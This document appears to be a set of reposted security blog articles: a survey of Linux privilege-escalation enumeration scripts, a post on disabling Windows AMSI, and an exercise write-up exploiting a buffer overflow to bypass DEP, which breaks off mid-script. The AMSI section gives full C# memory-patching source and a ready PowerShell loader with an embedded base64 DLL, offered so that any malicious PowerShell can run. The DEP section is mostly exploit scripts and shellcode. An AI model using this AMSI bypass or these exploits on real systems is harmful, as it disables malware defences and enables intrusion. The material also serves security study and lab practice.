Linux Privilege Escalation via Automated Script

Картинки по запросу Linux Privilege Escalation

( Original text by Raj Chandel )

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinuEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information helps the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

LinuEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through github with help of following command:

Once you download this script, you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what is brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which comes under the Post exploitation.

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

Let’s Analysis Its result what is brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/asroot.sh which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute following command to download it from the github:

 

To execute the script you need to run following command:

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etcdirectory. Similarly you can use getprem option to view all binaries files of the target‘s machine.

BeRoot

BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege.

 

To execute the script you need to run following command:

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents weak configuration that can lead to root privilege escalation whereas the red color represent the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing

Docker

Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on github, you can easily download it from github. These all automated script try to identify the weak configuration that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Реклама

How to bypass AMSI and execute ANY malicious Powershell code

Картинки по запросу amsi microsoft

( original text by 

Hello again. In my previous posts I detailed how to manually get SYSTEM shell from Local Administrators users. That’s interesting but very late game during a penetration assessment as it is presumed that you already owned the target machine.

This post will be more useful for early game, as AMSI (Anti Malware Scan Interface) can be a trouble to get a shell, or to execute post-exploitation tools while you still do not have an admin shell.

What is AMSI?

AMSI stands for “ANTI MALWARE SCAN INTERFACE”;

As it’s name suggests, it’s job is to scan, detect and block anything that does bad stuff.

Still doesn’t know what this is? Check this screenshot:

Screenshot

Obviously if you are experienced with penetration testing in Windows environments, you had such error with almost all public known scripts that are used like some in Nishang, Empire, PowerSploit and other awesome PowerShell scripts.

How does AMSI works?

AMSI uses “string-based” detection measures to determine if a PowerShell code is malicious or not.

Check this example:

Screenshot

Yes, the word “amsiutils” is banned. If have this word in your name, my friend, you are a malicious person for AMSI.

How to bypass string detection?

Everyone knows that string detection is very easy to bypass, just don’t use your banned string literally. Use encoding or split it in chunks and reassemble to get around this.

Here are three ways of executing the “banned” code and not get blocked:

Screenshot

Simply by splitting the word in half is enough to fool this detection scheme. We see this a lot in obfuscation. But in most of the cases, this method can fail.

Screenshot

In some cases, simply by decoding a Base64 banned code is enough to get around it.

Screenshot

And of course, you could use XOR to trick amsi and decode your string back to memory during runtime. This would be the more effective one, as it would need a higher abstraction to detect it.

All this techniques are to “GET AROUND” string detection, but we don’t want that. We want to execute the scripts in original state, the state where they are blocked by AMSI.

AMSI bypass by memory patching

This is the true bypass. Actually we do not “bypass” in the strict meaning of the word, we actually DISABLE it.

AMSI has several functions that are executed before any PowerShell code is run (from Powershell v3.0 onwards), so to bypass AMSI completely and execute any PowerShell malware, we need to memory patch them to COMPLETELY DISABLE it.

The best technique I have found in the internet is in this Link and it works in most recent version of Windows!

I wont enter in details about memory patching, you can get these details in above link

Instead, we will weaponize this technique and apply it to a PowerShell script, so we can use it in our real life engagements!

We will compile a C# DLL with code that will apply the above mentioned technique and then we will load and execute this code in a PowerShell session, disabling AMSI completely!

using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);


        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer.");
                return 1;
            }

            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufferPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer");
                return 1;
            }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;
            if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not change AmsiScanBuffer memory permissions!");
                return 1;
            }

            /*
             * This is a new technique, and is still working.
             * Source: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
             */
            Byte[] Patch = { 0x31, 0xff, 0x90 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
            MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

            Console.WriteLine("AmsiScanBuffer patch has been applied.");
            return 0;
        }
    }
}

Now, with possession of a DLL of the above code, use it like this:

Screenshot

See that we are able to use the banned word freely. From this point onwards, THERE IS NO AMSI. We are free to load ANY powershell script, malicious or not. By combining this type of attack with your malicious tools you will 100% success against AMSI.

Weaponinzing with PowerShell

Of course, in a Penetration Test we must have tools to apply such techniques automatically. Again, as we used .NET framework through C#, we can create a Posh script that reflects our DLL in-memory during runtime, without the need to touch the disk with our DLL.

Here is my PowerShell script to disable AMSI:

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9w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")) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable()
}

This will bypass string detection because it does not uses anything malicious at all. It just loads an .NET assembly to memory and execute it’s code. And after executing it, you are FREE to execute real PowerShell malware!

Check my results:

Screenshot

This technique is awesome and extremly useful. You can put to use a handful of PowerShell post-exploitation scripts like Nishang, Powersploit and any other PoSH hacking tool that once was blocked by the annoying AMSI.

I hope you liked this post, all the credits for the technique goes to guys from CyberArk website, I only showed how to effectively use it in a real-life scenario from an attacker perspective.

Best regards,

zc00l.

Bypass Data Execution Protection (DEP)

Hey folks! this topic details how to overflow a buffer, bypass DEP (Data Execution Prevention) and take control of the executable

Recommended Prerequisites

  • C/C++ language, a basic level would be fine
  • x86 Intel Assembly
  • Familiarity with Buffer Overflow
  • Debuggers/Disassembly

The binary

File 40
Virustotal 22

Okay, first thing we need to do is see what the executable brings us, so we run it.

r_opt

Here we see that it is asking for a file file.dat but as it does not exist it tells us that it cannot be opened, Once created we see that it shows us a message with 3 values at 0 that seem to correspond to 3 variables (cookie, cookie2 and size) and nothing else.

Since we don’t know what it does, let’s take a look at it.

This function has 5 variables, 4 of which are initialized at 0 and one at 32h (“2”), there is a pointer to LoadLibrary that is stored in 0x10103024 then makes a fopen to “fichero.dat” file in binary read mode, stores the FILE pointer in 0x10103020 and finally checks if it exists, if it does not exist it will go to 0x101010d3 and closes (as we saw before) and if it exists it goes to 0x101010e9, let’s look there

function2_opt(1)

Ok, in this procedure it first reads 4 bytes of fichero.dat with fread and stores them in a pointer to a block of memory look 10 (ebp-c), fread returns the total number of elements read and stores it in ebp-8, it does fread of 4 bytes again for the file and stores them in a pointer to ebp-10 then it does it one more time of 1 byte and stores it in a pointer to ebp-1, finally it compares this byte with [ebp-14] which is 32h (“2”) and if it is less than or equal (jle) it goes to 0x10101155 if it doesn’t, show a message saying “Nos fuimos al carajo” (We’re going to fuck off) and it closes.

Then we write in the file 8 bytes + the correct byte (“2”) and we enter 0x10101155, for example:

1234 + 5678 + 2

function3_opt

Well, here it pushes the saved bytes with fread and prints them, allocates 50 bytes (32h) of memory with malloc, stores the pointer to the allocated memory in ebp-1c then push the first 8 bytes of “fichero.dat” to 0x10101010, let’s look over there

function4_opt

Okay, what it does here is it takes the first 4 bytes of fichero.dat and adds them to the following 4 bytes then the result is compared to 58552433h, if the condition is correct, loads “pepe.dll”, then let’s make sure the condition is met (as it is little endian we have to put the bytes at backwards)

As not all characters meet the condition as “0” (30h) +»(» (28h) = 58h (1 byte correct) we do a script that does it and ready

data = "\x21\x1210" + "\x12\x12$(" + "2"
with open("fichero.dat", "w") as file:
	file.write(data)

Okay, this must meet the condition, let’s see.

check58_opt

Well, let’s see what’s it now.

buffer_opt

Once we leave 0x10101010 we see that it reads [ebp-1] bytes of fichero.dat with fread and stores it in a buffer pointing to (ebp-54), Okay, here’s a buffer overflow, let’s analyze it.

First we saw that the ninth byte of “fichero.dat” was stored in [ebp-1], then compared to [ebp-14] (“2”)

anal1_opt(1)

Well, now we see that that byte ([ebp-1]) is used as size of fread that will store that number of bytes (size) in a buffer (ebp-54) of 52 bytes, as the nearest variable is ebp-20, [ebp-54] — [ebp-20] = [ebp-34], so 34h (52d), we can also see it in the IDA stack, right click -> array -> ok

buffer_opt(1)

idastack_opt(1)

Okay, knowing all that, how could we overflow the buffer?

[ebp-1] is the ninth byte of fichero.dat, the size of fread for store in the buffer [ebp-54] and must also be less than or equal to 32h (“2”).

So we know that negative numbers in hexadecimal are higher in decimal, so if we put a negative number in hexadecimal it would allow us to enter more bytes than allowed (52d) and this is because it is signed (jle)

0x10101139 movsx ecx,  byte ptr ss:[ebp-1]
0x1010113d cmp ecx,    dword ptr ss:[ebp-14]
0x10101140 jle         stack9b.10101155

Let’s try to get to the edge of the buffer and at the same time overflowing 2 bytes of the fread stipulation (50 bytes, 32h).

data = "\x21\x1210" + "\x12\x12$(" + "\xff" + "A" * 52

with open("fichero.dat", "w") as file:
	file.write(data)

ff_opt
ffstack_opt

Cool!!! Let’s see what else there is to see if we can control the retn.

Well, now there is a procedure where it copy the buffer bytes [ebp-54] for the block in memory allocated by malloc [ebp-1c]

So, if I fill out [ebp-1c] with “\x41x41x41\x41” he won’t be able to write because it’s not a valid address, let’s find one that is.

ywrite_opt

All right, let’s check the stack, see how many bytes it takes to get to the start of retn and control it.

88b_opt

Okay, let’s set up our exploit

import subprocess

shellcode ="\xB8\x40\x50\x03\x78\xC7\x40\x04"+ "calc" + "\x83\xC0\x04\x50\x68\x24\x98\x01\x78\x59\xFF\xD1"

buff = "\x41" * 52
ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = shellcode


data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + ebp_20 + ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

Well, we already have EIP under control but now it doesn’t allow me to execute my shellcode, this is due to DEP (data execution prevention).

Summarizing up, DEP changes the permissions of the segments where data is stored to prevent us from executing code there -ricnar

So to bypass the DEP we can do ROP (return oriented programming) which is basically using gadgets that are program’s executable code to change the stack permissions with some api like VirtualProtect or VirtualAlloc

Looking for gadgets in pepe.dll I couldn’t find VirtualAlloc, but there is a pointer to system() , would only be missing a return that can be exit() and a fixed place that we can control to pass it a string to system()

system_opt(1)
exit_opt

Now only the string for system() would be missing, we can use the address with write permission

calc_opt(1)

Here I set up the stack because malloc only assigned 50 bytes and then had no control over the eip and that’s how the exploit would look.

import subprocess

system = "\x24\x98\x01\x78"    # system()
calc = "calc.exe"

buff = "\x41" * 42
#ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = system
exit = "\x78\x1d\x10\x10"    # exit()
ptr_calc = "\x5a\x30\x10\x10"



